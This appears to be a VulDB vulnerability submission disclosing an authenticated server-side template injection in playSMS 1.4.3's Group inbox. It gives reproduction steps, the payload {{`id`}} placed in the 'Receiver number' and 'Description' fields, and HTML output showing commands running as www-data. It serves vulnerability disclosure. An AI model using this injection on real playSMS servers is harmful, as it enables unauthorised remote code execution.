| Title | playSMS 1.4.3 Server Side Template Injection (SSTI) |
|---|
| Description | PlaySMS 1.4.3 has an authenticated Server Side Template Injection in Group inbox. Manipulation of the arguments "Receiver number" and "Description" leads to an authenticated RCE.
1. Authenticate on the login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login
2. Features > Group inbox (/index.php?app=main&inc=feature_inboxgroup&op=list)
3. Click the plus (+) icon to add a new group
4. Add the payload {{`id`}} in the "Receiver number" and "Description" fields
5. Save and go back to Features > Group inbox
We can also click the edit action to view the RCE in Description:
<tr><td class=label-sizer>Receiver number</td><td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</td></tr>
<tr><td>Keywords</td><td><input type='text' name='keywords' value='' maxlength='100'><i class='glyphicon glyphicon-info-sign playsms-tooltip' data-toggle=tooltip title='Separate with comma for multiple items' rel=tooltip></i></td></tr>
<tr><td>Description</td><td><input type='text' name='description' value='uid=33(www-data) gid=33(www-data) groups=33(www-data)
' maxlength='100'></td> |
|---|
| Source | ⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/inboxgroup |
|---|
| User | Dhimitri (UID 45045) |
|---|
| Submission | 25/06/2024 01:15 (2 years ago) |
|---|
| Moderation | 03/07/2024 07:29 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 270278 [playSMS 1.4.3 Template index.php?app=main&inc=feature_inboxgroup&op=list Receiver Number privilege escalation] |
|---|
| Points | 20 |
|---|